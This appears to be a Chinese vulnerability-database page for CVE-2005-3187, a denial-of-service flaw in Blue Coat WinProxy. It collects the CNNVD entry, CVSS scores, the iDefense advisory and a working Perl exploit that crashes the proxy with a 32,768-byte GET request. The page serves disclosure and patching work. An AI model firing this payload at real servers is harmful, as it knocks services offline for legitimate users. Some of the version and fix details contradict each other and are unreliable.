CVE-2005-3187
CVSS5.0
发布时间 :2005-12-31 00:00:00
修订时间 :2011-03-07 21:25:59
NMCOEPS    

[原文]The listening daemon in Blue Coat Systems Inc. WinProxy before 6.1a allows remote attackers to cause a denial of service (crash) via a long HTTP request that causes an out-of-bounds read.


[CNNVD]Blue Coat Systems WinProxy远程拒绝服务漏洞(CNNVD-200512-938)

        BlueCoat WinProxy是适用于中小业务的Internet共享代理服务器。
        WinProxy处理超长的畸形请求时存在问题,远程攻击者可能利用此漏洞对服务进行拒绝服务攻击。WinProxy无法正确的处理大约为32,768个字节长的HTTP请求。如果攻击者能够在TCP 80端口向WinProxy server发送上述的特制HTTP请求的话,就可以导致进程崩溃。仅有可访问包含有监听守护程序网段的攻击者才可以利用这个漏洞。在某些情况下这样的网段是专用的本地网。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3187
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3187
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-938
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16148
(PATCH)  BID  16148
http://www.vupen.com/english/advisories/2006/0065
(UNKNOWN)  VUPEN  ADV-2006-0065
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
(VENDOR_ADVISORY)  IDEFENSE  20060105 Blue Coat WinProxy Remote DoS Vulnerability
http://secunia.com/advisories/18288
(VENDOR_ADVISORY)  SECUNIA  18288

- 漏洞信息

Blue Coat Systems WinProxy远程拒绝服务漏洞
中危 其他
2005-12-31 00:00:00 2006-09-22 00:00:00
远程  
        BlueCoat WinProxy是适用于中小业务的Internet共享代理服务器。
        WinProxy处理超长的畸形请求时存在问题,远程攻击者可能利用此漏洞对服务进行拒绝服务攻击。WinProxy无法正确的处理大约为32,768个字节长的HTTP请求。如果攻击者能够在TCP 80端口向WinProxy server发送上述的特制HTTP请求的话,就可以导致进程崩溃。仅有可访问包含有监听守护程序网段的攻击者才可以利用这个漏洞。在某些情况下这样的网段是专用的本地网。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://download.winproxy.com/downloads/WinProxy.exe

- 漏洞信息 (1409)

BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit (EDBID:1409)
windows dos
2006-01-07 Verified
0 FistFuXXer
N/A [点击下载]
#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

# milw0rm.com [2006-01-07]
		

- 漏洞信息 (F42863)

iDEFENSE Security Advisory 2006-01-05.1 (PacketStormID:F42863)
2006-01-08 00:00:00
iDefense Labs,Manuel Santamarina Suarez  idefense.com
advisory,remote,web,denial of service
CVE-2005-3187
[点击下载]

iDefense Security Advisory 01.05.06 - Remote exploitation of a design error in Blue Coat Systems Inc.'s WinProxy allows attackers to cause a denial of service (DoS) condition. The vulnerability specifically exists due to improper handling of a long HTTP request that is approximately 32,768 bytes long. When such a request occurs, the process will crash while attempting to read past the end of a memory region.

Blue Coat WinProxy Remote DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

  http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability specifically exists due to improper handling of a long
HTTP request that is approximately 32,768 bytes long. When such a
request occurs, the process will crash while attempting to read past the
end of a memory region.

III. ANALYSIS

Successful exploitation requires an attacker to send a specially
constructed HTTP request to the WinProxy server on TCP port 80. This
will lead to a crash of the server and it will be unusable until it is
restarted.

This vulnerability may only be utilized by attackers who have access to
the network segment that contains the listening daemon, which in some
cases is a private local area network.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has
reported that previous versions are not affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3187 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

FistFuXXer is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright     

- 漏洞信息

22237
Blue Coat WinProxy HTTP Request Overflow DoS
Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2006-01-05 2005-12-10
2006-01-07 Unknow

- 解决方案

Upgrade to version 6.0 Blue Coat or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Blue Coat Systems WinProxy Remote Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 16148
Yes No
2006-01-05 12:00:00 2006-01-10 11:31:00
FistFuXXer is credited with the discovery of this vulnerability.

- 受影响的程序版本

Blue Coat Systems WebProxy 6.0
Blue Coat Systems WebProxy 6.1 a

- 不受影响的程序版本

Blue Coat Systems WebProxy 6.1 a

- 漏洞讨论

WinProxy is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to properly handle user-supplied data.

A remote attacker can exploit this issue to crash the server denying service to legitimate users.

This issue is reported to affect WinProxy version 6.0; other versions may also be vulnerable.

- 漏洞利用

No exploit is required.

The following proof of concept exploit code is available:

- 解决方案

The vendor has released an updated version addressing this issue:


Blue Coat Systems WebProxy 6.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站